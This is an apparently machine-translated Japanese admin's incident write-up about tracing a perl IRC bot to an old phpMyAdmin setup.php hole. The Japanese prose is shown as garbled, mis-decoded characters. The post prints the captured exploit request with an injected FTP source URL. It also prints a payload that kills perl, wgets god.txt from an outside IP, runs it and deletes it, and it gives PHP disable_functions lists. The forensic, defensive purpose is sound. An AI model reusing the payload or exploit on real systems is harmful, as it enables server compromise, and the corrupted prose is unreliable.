äž»ã«ç§ã®ãããžã§ã¯ãããã¹ããã管ççšã®ãµãŒããŒãããã€ããããŸããããããã«å ããŠãã¯ã©ã€ã¢ã³ããç¥äººãç¥äººãç¥äººãªã©ãå€ãã®æ®ããããµã€ããé
眮ããå¿
èŠããããŸããã 管çäžã«ããŸããŸãªåé¡ãçºçãããããäžéšã®ç£èŠèšå®ïŒzabbixããã³èªå·±èšè¿°åã¹ã¯ãªããïŒãæ§æãããŸããã
ãããŠæšæ¥ããµãŒããŒã®1ã€ã§ãã¢ã¯ãã£ããªæ¥ç¶ããã§ãã¯ããã¹ã¯ãªãããã¢ã©ãŒã ã鳎ãããŸãããããŒã433ã®äžæãªãã¹ããžã®éä¿¡æ¥ç¶ã¯ãæææ¥ã®æã«ã¡ãŒã«ãèªãããšãç¿åŸããæç¹ã§9æé以äžãåžžã«ãã³ã°ããŠããŸãã
ã«ãŒãœã«ã¹ãã£ã³äžã«ããã®ã¢ã¯ãã£ããªæ¥ç¶ã«å ããŠãã·ã¹ãã ã§ç°åžžãæ®ãããããã»ã¹ãæ€åºãããªããªããã€ã³ã¿ãŒãã§ã€ã¹äžã®ãã©ãã£ãã¯ã®æ¥æ¿ãªå¢å ãæ€åºãããŸããããããã¯ç§ãå®å¿ããããã®ã§ã¯ãªãã£ãã®ã§ãããã«èª¿ã¹ãå¿
èŠããããŸããã
åæã®çµæã«åºã¥ããŠãåºæ¬çãªPHPèšå®ãæã€ã»ãšãã©ã®ãµãŒããŒã«åæ§ã®ã»ãã¥ãªãã£ããŒã«ãååšããå¯èœæ§ãããããšãããã£ãããããã®ãããªå Žåãããã¹ãã£ã³ã°ã§ãµãŒããŒã®ææè
ã®æ®ããä¿è·ããããã«ããã«æçš¿ããããšã決å®ãããµãŒããŒãžã®æææºãèŠã€ããæ¹æ³ã説æããŸããã
ãã®ã·ã¹ãã ã¯ãDebian Lennyã«ãã£ãŠææ°ã®æŽæ°ãšãšãã«ã€ã³ã¹ããŒã«ãããŸããããã¯ããŒãsqueezeãpostfix + dovecotãapache2ãlighttpdãmysqlãphpãperl workããã-äžè¬çã«ã¯ã»ãŒåºæ¬çãªæ§æã§ãã
ãã®æ¥ç¶ãçºèŠããç§ã®ã¹ã¯ãªããã¯æ¬¡ã®ããšãè¡ããŸãïŒ30åããšã«
lsof -nP -i :80,443,25 +c 15
ïŒããŒã80,443,25ãžã®ã¢ã¯ãã£ããªçºä¿¡æ¥ç¶ã®ãªã¹ãïŒãããããpostfixã¡ãŒã«ãµãŒããŒãåæããç§ã®ããã»ã¹ã®ããã€ãããããŠãããã®ã»ãã«èª°ããæ¥ç¶ãç¶æããããã«ãããã¯ã¢ãŒãããªã³ã«ããå Žåã
ãã®ã¹ã¯ãªããã®çµæã«åºã¥ããŠã次ã®æ
å ±ãåãåããŸããã
perl 31621 www-data 4u IPv4 123556667 TCP [_ip]:59216->81.223.126.136:443 (ESTABLISHED)
ç§ã¯ããã«sshã§æ¥ç¶ããps auxãäœæããŸããã
UID PID PPID C STIME TTY TIME CMD
www-data 31621 1 0 20:15 ? 00:00:00 /usr/sbin/apache2 -k start
ã€ãŸã psããã¯perlã§ã¯ãªããApacheã§ãããšäž»åŒµããŸããã
ãããã£ãŠããã®ããã»ã¹ãã·ã¹ãã ã«è¡šç€ºãããæ£ç¢ºãªæéãç¥ãããã®æéäžã«ãã°ãæ€çŽ¢ãããã£ãã®ã§ãããã¹ã¯ãªããã«ã¯30åé
ãããããããã«å¯ŸããŠå€ãã®ãã°ãæžã蟌ãããšãã§ããŸããã ç¹å®ã®éå§æ¥ãææ¡ããã®ã¯ããªãåé¡ããããps auxã³ãã³ãã¯/ proc /ãã¡ã€ã«äœææ¥ãšèµ·åæ
å ±ïŒæåŸã®æ¥ã12æ12æ¥ïŒã®ã¿ãæäŸããæ
å ±ã®ã¯ã€ãã¯ã«ãã¯ã§èŠã€ãã£ãæ®ãã¯ã¹ã¯ãªããã¡ãã»ãŒãžã®ééãšäžèŽããŸããã§ããããã¢ã¯ãã£ããªã°ãŒã°ã«ã®åŸéæ³ã®ã³ãã³ããèŠã€ããŠããã®ããã»ã¹ã®ç¹å®ã®éå§æéã1ç§ã®ç²ŸåºŠã§èŠã€ããããšãã§ããŸããã
# ps -eo pid,lstart,cmd
2çªç®ã®åã«ã¯ãããã»ã¹12.12.2010 23:59:40ã®ããã»ã¹ãéå§ãããæ£ç¢ºãªæå»ã衚瀺ãããŸãã
ãã®éãåä»®æ³ãã¹ãã®ãã°ãæ
éã«èª¿ã¹ãŠããã€ãã¹5åãŸã§ããã®ç¬éããç°åžžãªãã®ã¯èŠã€ãããŸããã§ããïŒ ãŸããããã»ã¹ããªãŒãæ§ç¯ãããã®ããã»ã¹ã«ã¯èŠªïŒpid 0ãæã€èŠªïŒããªãããšã確èªããŸããã ãŸããæ¥ç¶ããã³ã°ããIPã¢ã¯ã»ã¹ïŒ81.223.126.136ïŒã«ã¯ããã°ã«åäžã®ããŒã¢ã³ããããŸããã§ããã
ããã«ãperlã«é¢ããã°ãŒã°ã«æ€çŽ¢ã§ã¯ãã³ãã³ããã©ã¡ãŒã¿ãŒãä»ã®ããã¹ãã«å€æŽããããšã¯éåžžã«ç°¡åã§ããããšãããããŸãããããã¯å€æ°$ 0ãä»ããŠè¡ãããŸãã å®è¡äžã®perlããã»ã¹ã¯ãmysqldãinitããŸãã¯ãã®ä»ã®ããŒã¢ã³ãšããŠè¡šç€ºã§ããŸãã
åèšã§ã芪ã®ãªãã¢ã¯ãã£ããªperlããã»ã¹ããããŸããããã¯9æé以äžãã³ã°ããã©ãããã§ãå®è¡ãããŠããŸããããã¹ãã£ã³ã°ã§ã¯ã©ãã«ãPHPãããããŸããã ãããã£ãŠãApacheãåèµ·åããŠãããã®ããã»ã¹ã¯ã¢ã¯ãã£ãã®ãŸãŸã«ãªããŸãã
次ã«ãtcpdumpãä»ããŠãã©ãã£ãã¯ã®åæãè©Šã¿ãŸããã
000033 IP [my_ip].55026 > 81.223.126.136.443: . ack 1 win 46 <nop,nop,timestamp 575834701 2876573490>
000172 IP [my_ip].55026 > 81.223.126.136.443: P 1:13(12) ack 1 win 46 <nop,nop,timestamp 575834701 2876573490>
001043 IP 81.223.126.136.443 > [my_ip].54320: . ack 163 win 54 <nop,nop,timestamp 2876573490 575834655>
183151 IP 81.223.126.136.443 > [my_ip].55026: . ack 13 win 46 <nop,nop,timestamp 2876573536 575834701>
000022 IP [my_ip].55026 > 81.223.126.136.443: P 13:145(132) ack 1 win 46 <nop,nop,timestamp 575834747 2876573536>
000005 IP 81.223.126.136.443 > [my_ip].55026: P 1:77(76) ack 13 win 46 <nop,nop,timestamp 2876573536 575834701>
000006 IP [my_ip].55026 > 81.223.126.136.443: . ack 77 win 46 <nop,nop,timestamp 575834747 2876573536>
001213 IP 81.223.126.136.47092 > [my_ip].113: S 4059834353:4059834353(0) win 5840 <mss 1460,sackOK,timestamp 2876573536 0,nop,wscale 7>
000019 IP [my_ip].113 > 81.223.126.136.47092: S 2188075368:2188075368(0) ack 4059834354 win 5792 <mss 1460,sackOK,timestamp 575834748 2876573536,nop,wscale 7>
ãŸãã圌ã¯htopã³ãã³ãã§straceãå®è¡ããæ©èœãèŠã€ããŸããã
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 559974})
read(4, "ERROR :Closing Link: Fasso'[sea.q"..., 4096) = 76
select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 599998})
read(4, ""..., 4096) = 0
close(4) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0x7fff99d8c7a0) = -1 EINVAL (Invalid argument)
lseek(4, 0, SEEK_CUR) = -1 ESPIPE (Illegal seek)
ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0x7fff99d8c7a0) = -1 EINVAL (Invalid argument)
lseek(4, 0, SEEK_CUR) = -1 ESPIPE (Illegal seek)
fcntl(4, F_SETFD, FD_CLOEXEC) = 0
connect(4, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("81.223.126.136")}, 16) = 0
getsockname(4, {sa_family=AF_INET, sin_port=htons(54087), sin_addr=inet_addr("[my_ip]")}, [149023476701724688]) = 0
write(4, "NICK Fasso'\n"..., 12) = 12
getsockname(4, {sa_family=AF_INET, sin_port=htons(54087), sin_addr=inet_addr("[my_ip]")}, [149023476701724688]) = 0
write(4, "USER fake [my_ip] 81.223.1"..., 132) = 132
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGCHLD, NULL, {SIG_IGN}, 8) = 0
nanosleep({2, 0}, {2, 0}) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 599997})
read(4, "NOTICE AUTH :*** Looking up your "..., 4096) = 113
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 198392})
read(4, "NOTICE AUTH :*** Couldn't look up"..., 4096) = 66
write(4, "PONG :258562266\n"..., 16) = 16
select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 413936})
read(4, ":god.undernet.hk 432 * Fasso' :Er"..., 4096) = 50
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
15:59:55 icq.j-im.ru
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 198392})
read(4, "NOTICE AUTH :*** Couldn't look up"..., 4096) = 66
write(4, "PONG :258562266\n"..., 16) = 16
select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 413936})
read(4, ":god.undernet.hk 432 * Fasso' :Er"..., 4096) = 50
select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)
ãã®ããŒã¿ããããã®ãããã¯å®æçã«ãµãŒããŒãšæ
å ±ã亀æããŠããããšãããããŸããïŒ30ã60ç§ããšïŒã ã¢ã¯ãã£ãã«åäœããŸããããã©ãã£ãã¯ã¯ããŸãçºçããŸãããgod.undernet.hkãã¹ããèŠãŸããããã·ã¹ãã å
ã§ãããã®ãœãŒã¹ãèŠã€ããã®ã«åœ¹ç«ã¡ãŸããã§ããã
次ã«ãããå°ãé ã䜿ã£ãŠlsof -p 31621ãå®è¡ãããšã次ã®åºåãåŸãããŸããã
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
perl 31621 www-data cwd DIR 9,4 640 2 /tmp
perl 31621 www-data rtd DIR 9,1 4096 2 /
perl 31621 www-data txt REG 9,1 6848 245277 /usr/bin/perl
perl 31621 www-data mem REG 9,1 25536 310438 /usr/lib/perl/5.10.0/auto/Socket/Socket.so
perl 31621 www-data mem REG 9,1 19704 310433 /usr/lib/perl/5.10.0/auto/IO/IO.so
perl 31621 www-data mem REG 9,1 39112 1404408 /lib/libcrypt-2.7.so
perl 31621 www-data mem REG 9,1 1375536 262722 /lib/libc-2.7.so
perl 31621 www-data mem REG 9,1 130114 261372 /lib/libpthread-2.7.so
perl 31621 www-data mem REG 9,1 534736 1404410 /lib/libm-2.7.so
perl 31621 www-data mem REG 9,1 14616 1404409 /lib/libdl-2.7.so
perl 31621 www-data mem REG 9,1 1499352 246277 /usr/lib/libperl.so.5.10.0
perl 31621 www-data mem REG 9,1 119288 262716 /lib/ld-2.7.so
perl 31621 www-data 0u unix 0xffff880080459200 122918994 /tmp/php.socket-1
perl 31621 www-data 1w FIFO 0,8 123556620 pipe
perl 31621 www-data 2w REG 9,1 838 979223 /var/log/lighttpd/error.log
perl 31621 www-data 3u unix 0xffff880020d31500 123039634 /tmp/php.socket-1
perl 31621 www-data 4u IPv4 123556667 TCP [_ip]:59216->136-126-223-81.static.edis.at:https (ESTABLISHED)
ãã®çµè«ã¯ãlighttpdãšããèšèã®ååšã«ãã£ãŠããã«é©ããïŒç§ã¯ãµãŒããŒäžã«2ã€ã®IPãæã¡ãäžæ¹ã¯Apacheããã³ã°ããããäžæ¹ã¯lighttpdïŒãpsã§ã¯ããã»ã¹ã¯Apacheã§ããããã«èŠããæããã«/ tmpããèµ·åãããŸãã
ããã«æŽè³ããåŸãç§ã¯ãã®ããã»ã¹ã®ã¡ã¢ãªããã³ãããããšã«ããŸãããã/ proc // memã®èªã¿åãã¯åœ¹ã«ç«ã¡ãŸããã§ããã ããããgcoreã³ãã³ãïŒgdbããã±ãŒãžããïŒã圹ç«ã¡ãŸãã-ãã®å©ããåããŠãç§ã¯ãã®ããã»ã¹ã®ã¡ã¢ãªã3.2mbãŸã§ã«ãã³ãã§ããæåã§è¡šç€ºãå§ããŸããã 衚瀺ãããšãç®ã§æ¬¡ã®ããã¹ããã©ã°ã¡ã³ããèŠãããšãã§ããŸããã
@fakeps
/usr/sbin/apache2 -k start
god.txt
HTTP_HOST=[my_ip]..!.......DOCUMENT_ROOT=/var/www/.A.......SCRIPT_FILENAME=/var/www/phpmyadmin3/scripts/setup.php..A.......SCRIPT_NAME=/phpmyadmin3/scripts/setup.php..............!.......PHP_FC
GI_CHILDREN=16....1.......PATH=/sbin:/bin:/usr/sbin:/usr/bin......!.......PWD=/tmp................1.......REMOTE_ADDR=62.193.226.196..............!.......SHLVL=1.................1.......PHP_FCGI_MAX_REQUESTS=10000.............1.......OLDPWD=/
var/www/phpmyadmin3.............!......._=/usr/bin/perl
ãããŒãæãŸã£ãïŒ Pearlã¯PHPã¹ã¯ãªãã/var/www/phpmyadmin3/scripts/setup.phpããèµ·åãããŸãã
Googleã«ã¢ã¯ã»ã¹ããŠããphpmyadmin setup.php exploitããšå
¥åããæå¹ãªãšã¯ã¹ããã€ããèŠã€ããŸããwww.securityfocus.com/ bid / 34236-2009-03-24ã«çºèŠãããŸãã
ãphpmyadminWebãµã€ãwww.phpmyadmin.net/ã«ããã
ãŸã ã
home_page / security / PMASA-2009-3.php ãããŒãžã§ã³
2.11.9.5ããã³
3.1.3.1ã§ã®ã¿ä¿®æ£ãããŠããŸãã
ãã®phpmyadminã¯ãããªãé·ãéæåã§èšå®ãããŸããã ãªããžããªã«3ã€ã®ããŒãžã§ã³ã¯ãããŸããã§ãããããŒãžã§ã³3.0.0-rc2ãã€ãŸã ãŸã 空ã®ç©Žã®ããå€ããã®ã§ãããããç§ã¯ãããå®å
šã«å¿ããŠä»æ¥ãŸã§æ»ãã ãŸãŸã«ããŠãããŸããã
ããã«ãphpã¹ã¯ãªããã®ã¢ãã¬ã¹ããã§ã«ç¥ã£ãŠãããããlighttpdãã°ã§åŒã³åºããèŠã€ããããšãã§ããŸããã
62.193.226.196 [my_ip] - [12/Dec/2010:15:54:57 +0300] "GET /phpmyadmin3/scripts/setup.php HTTP/1.1" 200 14083 "http://[my_ip]/phpmyadmin3/scripts/setup.php" "Opera"
62.193.226.196 [my_ip] - [12/Dec/2010:15:54:59 +0300] "POST /phpmyadmin3/scripts/setup.php HTTP/1.1" 200 556203 "http://[my_ip]/phpmyadmin3/scripts/setup.php" "Opera"
ç§ãç解ããŠããªãã®ã¯æéå·®ã ãã§ããªã¯ãšã¹ãã¯15:54ã§ãããã»ã¹ã¯23:59ã«çŸããŸããã
ç§ã¯ãŸã ã©ã®ããããç§ãããæããããç¥ãããã£ãã®ã§ãã¹ã¯ãªãããžã®ã¢ã¯ã»ã¹ããããã¯ãã代ããã«ãããã«ãã©ãããèšå®ããŸããã
$loginfo['date']=date('c'); $loginfo['env']=var_export($_ENV,true); $loginfo['get']=var_export($_GET,true); $loginfo['post']=var_export($_POST,true); file_put_contents('log.txt',var_export($loginfo,true),FILE_APPEND);
ãã©ããã¯ããã»ã©é·ãã¯ãããããç¿æ¥ã®22æã«åã³ãã®ã¹ã¯ãªãããžã®ã¢ããŒã«ããã£ããããæ¢ã«ãšã¯ã¹ããã€ãã³ãŒãããããŸãã
'post' => 'array ( \'action\' => \'lay_navigation\', \'eoltype\' => \'unix\', \'token\' => \'4b179cfc2f788d828bf9ff8d2f122459\', \'configuration\' => \'a:1:{i:0;O:10:\\\\"PMA_Config\\\\":1:{s:6:\\\\"source\\\\";s:44:\\\\" ftp://web1:l33t@85.25.132.71/html/godbot.txt\\\\";}}\', )'
wgetãä»ããŠãã®ãã¡ã€ã«ãããŠã³ããŒããã以äžãåç
§ããŠãã ããã
<?php system("cd /tmp;killall -9 perl;wget -O god.txt 67.19.118.242/god.txt;perl god.txt;rm -f god.txt*");die;
ããã«ãªã³ã¯ã§ã¯ããããã³ãŒãèªäœïŒ34 kãã€ãïŒãæ¢ã«ååŸããŠããŸããèå³ã®ããæ¹ã¯ãããŠã³ããŒãããŠç¢ºèªã§ããŸãã
å
šäœãšããŠããã®ãããã®äŸµå
¥ã®åå ãèŠã€ããŠããããèªäœã®ã³ãŒããååŸããããšãã§ããŸããã ç©Žãä¿®æ£ããããã«æ®ããŸã;ïŒ
ç§ã®åæã®èª¬æããä»ã®ç®¡çè
ããµãŒããŒäžã®ãã¹ãŠã®æªã®æ€çŽ¢ãšåæã«åœ¹ç«ã€ããšãé¡ã£ãŠããŸãã
ãã®ãããªå Žåãã身ãå®ãæ¹æ³
æåã«é ã«æµ®ãã¶ã®ã¯ãæéå
ã«ææ°ããŒãžã§ã³ã«æŽæ°ããå¿
èŠããããšããããšã§ãã ã¯ãããã®ç¹å®ã®å Žåãphpmyadminã®ããŒãžã§ã³ã«åŸããªãã£ãã®ã¯ç§èªèº«ã®ããã§ããããã¹ãã£ã³ã°ã®ãã¹ãŠã®ã¯ã©ã€ã¢ã³ãã«phpmyadminã絶ããæŽæ°ãããããšã¯ã§ããŸãããããŒã ãã©ã«ããŒã«ã¢ã¯ã»ã¹ã§ãããŠãŒã¶ãŒã¯ãæ¢ã«åæ§ã®åé¡ã®åå ã«ãªã£ãŠããŸãã åãµã€ãã®ã³ãŒãã®æž
æœããšã»ãã¥ãªãã£ã®ããã«æŠãã®ã¯ç¡æå³ã§ã;ã°ããŒãã«ãªä¿è·å¯Ÿçãè¬ããå¿
èŠããããŸãã
åºæ¬çãªphpèšå®ãæã€ãã¹ãŠã®ãµãŒããŒãæœåšçã«åæ§ã®è
åšã«ãããããå¯èœæ§ãããããã®ãããªãããããµãŒããŒã«èœã¡çããããšã«æ°ä»ãããšã¯ã»ãšãã©äžå¯èœã§ãã ãããã£ãŠã管çè
ã¯äºåã«åæ§ã®åé¡ãããµãŒããŒãä¿è·ããç°åžžãªã¢ã¯ãã£ããã£ã®ç£èŠãæ§æããããšããå§ãããŸãã
次ã®ã»ãã¥ãªãã£å¯Ÿçãè¬ããŸããã
1.ã¢ã¯ãã£ããªæ¥ç¶ã®å®æçãªç£èŠãèšå®ããŸããããã«ãããPHPã¹ã¯ãªãããŸãã¯ãµãŒããŒãžã®ãããã®æ¥ç¶ã§ã¹ãã éä¿¡ããŠãããã©ããã«ããããããç°åžžãªã¢ã¯ãã£ããã£ã«ããã«æ°ä»ãããšãã§ããŸãã ãã®ã¹ã¯ãªããã§ã¯ãããã«lsofã³ãã³ããšãã®ããã»ã¹ã®ã¡ã¢ãªãã³ããè¿œå ããŸããã èªåã§ãµãŒããŒã«ãã©ãçããŸã§ã«ãã¹ã¯ãªããã¯æ¢ã«åäœããŠã¢ã³ããŒãããŠããå¯èœæ§ããããŸãã
2. execãsystemãªã©ã®é¢æ°ã®å®è¡ã«é¢ããphpã®çŠæ¢ã ã»ãšãã©å¿
èŠãªããããã»ãšãã©ã®ã客æ§ã¯äœ¿çšãããŸããã ãããã®é¢æ°ã䜿çšãããã®ã³ã°ã¯çæ³çãªãªãã·ã§ã³ã§ããããããè¡ãæ¹æ³ãèŠã€ãããŸããã§ãã
ïŒãšããã§ã誰ãããããè¡ãæ¹æ³ãæããŠããããŸããïŒïŒ php.iniã®å
šè¡ã¯æ¬¡ã®ãšããã§ãã
disable_functions = "ini_alter, curl_exec, exec, system, passthru, shell_exec, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, leak, listen, chgrp, apache_note, apache_setenv, closelog, debugger_off, debugger_on, define_sys
log_variables, openlog, syslog,ftp_exec,dl"
ä¿è·æ¹æ³ãæ£ããéžæãããã©ããããããŠãµãŒããŒäžã§ãã®ãããªã±ãŒã¹ã誰ãä¿è·ãããã«ã€ããŠãhabrayuzersã®ã³ã¡ã³ããèããããšæããŸãã
ãŸãã次ã®è³ªåã¯ç§ã«éããããŸãŸã§ããã
- ã¡ã¢ãªãã³ãã䜿çšããã«ã¯ã©ãã¯ãæåã§è¡šç€ºããã«ãããã»ã¹ãšããã»ã¹ãžã®ãã¹ãæ¢ã«ããã»ã¹ã«ãã£ãŠäžæžããããŠããå Žåãããã»ã¹ãéå§ããå®éã®ã³ãã³ããèŠã€ããã«ã¯ã©ãããã°ããã§ããïŒ
- Linuxã§ã¯ãã©ã®ããã«ããŠãpidãç¥ã£ãŠããç¹å®ã®ããã»ã¹ããã®tcpdumpãŸãã¯åæ§ã®ãŠãŒãã£ãªãã£ãä»ããŠãã¹ãŠã®ãã©ãã£ãã¯ãååããŠè¡šç€ºã§ããŸããïŒ
- æ¥ç¶äžã®éæšæºã®ãµãŒããŒã¢ã¯ãã£ããã£ãç£èŠããããã®æ¢è£œã®ãœãªã¥ãŒã·ã§ã³ã¯ãããŸããïŒ
- PHPã§execé¢æ°ãªã©ã®å®è¡ããã°ã«èšå®ããæ¹æ³ã¯ãããŸããïŒ
UPDãïŒãšããã§ããã®ç©Žã¯ãªããžããªããphpmyadminã§éããããªãå ŽåããããŸããããã¯ã泚ææ·±ãèŠãå¿
èŠããããŸãã ç©Žã¯ãããŒãžã§ã³
2.11.9.5ããã³
3.1.3.1ã§ã®ã¿ããããããŸããã ããããäŸãã°ãDebian Lennyã¯4ïŒ2.11.8.1-5 + lenny6ã«ãªããå¥ã®ããã-httpïŒ//www.debian.org/security/2009/dsa-1824ã§ç©ŽãéããããŸã
ãã®ããŒã«ã®è©³çŽ°ïŒ
www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
UPD2ïŒç¹å®ã®ããã»ã¹ã®ãããã¯ãŒã¯ãžã®ã¢ã¯ã»ã¹ãå¶éããããã«ãäœããã®æ¹æ³ã§ãã¡ã€ã¢ãŠã©ãŒã«ãä»ããŠèšå®ã§ããŸããïŒLinuxã®å Žåã¯iptablesã«ãªããŸãïŒã ããšãã°ããã¹ãŠã®perlããã»ã¹ãå€éšã«æ¥ç¶ããããšãçŠæ¢ããŸãã Android OSïŒLinuxã«ãŒãã«ã§ãåäœããŸãïŒã«ã¯ãç¹å®ã®ã¢ããªã±ãŒã·ã§ã³ã®ãããã¯ãŒã¯ãžã®ã¢ã¯ã»ã¹ãèš±å¯/æåŠã§ããDroidWallããã°ã©ã ããããŸãããåºæ¬çãªLinuxãã£ã¹ããªãã¥ãŒã·ã§ã³ïŒDebianãªã©ïŒã§ã¯ããããå®è¡ã§ãããã©ãããç解ã§ããŸããã§ããã
UPD3ïŒã³ã¡ã³ããšæåã«åºã¥ããŠãé¢æ°ã®ãªã¹ããè¿œå ããäžèŠãªé¢æ°ãããã€ã
åé€ããŸããã
disable_functions = "apache_setenv, chown, chgrp, closelog, define_syslog_variables, dl, exec, ftp_exec, openlog, passthru, pcntl_exec, popen, posix_getegid, posix_geteuid, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_open, proc_terminate, shell_exec, syslog, system"
UPD4ïŒèŠèŽè
ã®èŠæã«å¿ããŠè¿œå ãããè¿œå ïŒ
ã¢ã¯ãã£ããªæ¥ç¶ããã§ãã¯ããããã®ã¹ã¯ãªããïŒïŒ ç§ã®å人çãªããŒãºã®ããã«èã®äžã«ãã°ããæžãããŸããïŒ
$out=system("lsof -nP -i :80,443,25 +c 15 | grep -v -E '^(COMMAND|apache2|zabbix|smtpd?|master|scache|host|lighttpd)' | grep -v 'wget.*>[my_ip]:80'"); if(strlen($out)) { $arr=explode("\n",$out); foreach($arr as $str) { echo $str."\n"; $spl=preg_split("/\s+/",$str); echo `ps -f -p {$spl[1]}`."\n\n"; echo `lsof -p {$spl[1]}`."\n\n"; }
ãããŠã30åããšã«cronã«ç»é²ããŸãã èµ·åæã«äœåãªãã®ã衚瀺ãããå Žåã¯ãgrepããªã¹ãã«è¿œå ããŠãå¹²æžããªãããã«ããŸãã ãã®çµæãã¹ãã ãããŠã³ããŒããè©Šã¿ããã®ãæ®ã£ãŠããå Žåã¯ãããã«cronãã¡ãŒã«ã§éç¥ããŸãã
UPD4ïŒãŠãŒã¶ãŒ
z123ããïŒããã»ã¹ãéå§ããå®éã®ããã°ã©ã ãèŠã€ããæ¹æ³ïŒå€æŽãããå ŽåïŒïŒ
ps -p 123 -o comm
readlink / proc / 123 / exeïŒ123ã¯ããã»ã¹çªå·ã«çœ®ãæãïŒ
ããããæ®å¿µãªãããèµ·åãã©ã¡ãŒã¿ãŒãšãã©ã«ããŒã¯è¡šç€ºãããŸãããããã®ãããã«ã¯perlãš/ usr / bin / perlã®ã¿ã衚瀺ããããããã¡ã¢ãªãã³ããªãã§ã¯ãææå
ã®ãã©ã«ããŒãèŠã€ããæ¹æ³ãèŠã€ãããŸããïŒã€ãŸãã
/var/www/phpmyadmin3/scripts/setup.php
è¡ãèŠã€ããŸãïŒ
/var/www/phpmyadmin3/scripts/setup.php
ïŒ